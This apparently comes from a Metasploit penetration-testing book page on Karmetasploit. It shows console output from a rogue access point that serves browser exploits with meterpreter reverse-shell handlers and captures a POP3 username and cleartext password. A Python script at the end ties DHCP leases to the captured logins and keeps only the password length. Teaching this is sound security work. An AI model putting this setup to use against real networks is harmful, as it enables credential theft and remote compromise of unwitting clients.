Karmetasploit
181
URIPATH => /ads
resource (karma.rc)> run
[*] Auxiliary module execution completed
resource (karma.rc)> use auxiliary/server/capture/pop3
resource (karma.rc)> set SRVPORT 110
SRVPORT => 110
resource (karma.rc)> set SSL false
SSL => false
resource (karma.rc)> run
. . . SNIP . . .
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:55550/N9wReDJhfKg
[*] Local IP: http://192.168.1.101:55550/N9wReDJhfKg
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 10.0.0.1:3333
[*] Starting the payload handler...
[*] Started reverse handler on 10.0.0.1:6666
[*] Starting the payload handler...
[*] --- Done, found 15 exploit modules
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://192.168.1.101:55550/ads
[*] Server started.
As you can see, a great deal is happening with the resource file. In this listing, the LHOST address is set to 10.0.0.1, the POP3 service (among others) is started, the autopwn exploits are loaded, and payloads are configured.
Credential Harvesting
When a client connects to our malicious access point, the messages file we are tailing will show us when an IP address is handed out. This is our cue to switch back to msfconsole to see what is happening. Here, we see that a client connects and is assigned an IP address:
Apr 2 15:07:34 bt dhcpd: DHCPDISCOVER from 00:17:9a:b2:b1:6d via at0
Apr 2 15:07:35 bt dhcpd: DHCPOFFER on 10.0.0.100 to 00:17:9a:b2:b1:6d (v-xp-sp2-bare) via at0
Apr 2 15:07:35 bt dhcpd: DHCPREQUEST for 10.0.0.100 (10.0.0.1) from 00:17:9a:b2:b1:6d (v-xp-sp2-bare) via at0
Apr 2 15:07:35 bt dhcpd: DHCPACK on 10.0.0.100 to 00:17:9a:b2:b1:6d (v-xp-sp2-bare) via at0
The first thing our target does is open an email client. Karmetasploit is waiting, as shown here:
[*] DNS 10.0.0.100:1049 XID 45030 (IN::A time.windows.com)
[*] DNS 10.0.0.100:1049 XID 47591 (IN::A pop3.securemail.com)
[*] POP3 LOGIN 10.0.0.100:1102 bsmith / s3cr3tp4s5
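As an added illustration (not code from the book or from Metasploit), the following Python script correlates the dhcpd lease lines with the Karmetasploit console output shown above: only the DHCPACK binds the address to a MAC and hostname, and the DNS lookups and the POP3 login captured on port 110 with SSL disabled are then attached to that client. The sample lines are constructed from the ones printed on this page, and the regular expressions assume exactly those line formats; the password is recorded only as its length, since the evidence that matters is that it was sent in cleartext.

```python
import re

# Constructed sample input, modelled on the dhcpd syslog lines and the
# Karmetasploit console output shown on this page.
DHCPD_LOG = """\
Apr 2 15:07:34 bt dhcpd: DHCPDISCOVER from 00:17:9a:b2:b1:6d via at0
Apr 2 15:07:35 bt dhcpd: DHCPOFFER on 10.0.0.100 to 00:17:9a:b2:b1:6d (v-xp-sp2-bare) via at0
Apr 2 15:07:35 bt dhcpd: DHCPREQUEST for 10.0.0.100 (10.0.0.1) from 00:17:9a:b2:b1:6d (v-xp-sp2-bare) via at0
Apr 2 15:07:35 bt dhcpd: DHCPACK on 10.0.0.100 to 00:17:9a:b2:b1:6d (v-xp-sp2-bare) via at0
"""
MSF_LOG = """\
[*] DNS 10.0.0.100:1049 XID 45030 (IN::A time.windows.com)
[*] DNS 10.0.0.100:1049 XID 47591 (IN::A pop3.securemail.com)
[*] POP3 LOGIN 10.0.0.100:1102 bsmith / s3cr3tp4s5
"""

# Only DHCPACK commits a lease; DISCOVER/OFFER/REQUEST are ignored on purpose.
ACK_RE = re.compile(r"dhcpd: DHCPACK on (\S+) to (\S+)(?: \((\S+)\))? via (\S+)")
DNS_RE = re.compile(r"^\[\*\] DNS (\S+):\d+ XID \d+ \(IN::A (\S+)\)")
POP3_RE = re.compile(r"^\[\*\] POP3 LOGIN (\S+):\d+ (\S+) / (\S+)")

def leases(dhcpd_log):
    """Map each leased IP to (mac, hostname, interface) from DHCPACK lines."""
    out = {}
    for line in dhcpd_log.splitlines():
        m = ACK_RE.search(line)
        if m:
            ip, mac, host, iface = m.groups()
            out[ip] = (mac, host or "?", iface)
    return out

def correlate(dhcpd_log, msf_log):
    """Attach DNS lookups and captured POP3 logins to the leased client."""
    clients = leases(dhcpd_log)
    report = {}
    for line in msf_log.splitlines():
        if m := DNS_RE.match(line):
            ip, name = m.groups()
            report.setdefault(ip, {"dns": [], "logins": []})["dns"].append(name)
        elif m := POP3_RE.match(line):
            ip, user, pw = m.groups()
            # keep the username and password length only, never the cleartext secret
            report.setdefault(ip, {"dns": [], "logins": []})["logins"].append((user, len(pw)))
    return {ip: dict(info, client=clients.get(ip)) for ip, info in report.items()}

if __name__ == "__main__":
    for ip, info in correlate(DHCPD_LOG, MSF_LOG).items():
        mac, host, iface = info["client"] or ("?", "?", "?")
        print(f"{ip} ({host}, {mac}, via {iface}): dns={info['dns']} pop3={info['logins']}")
```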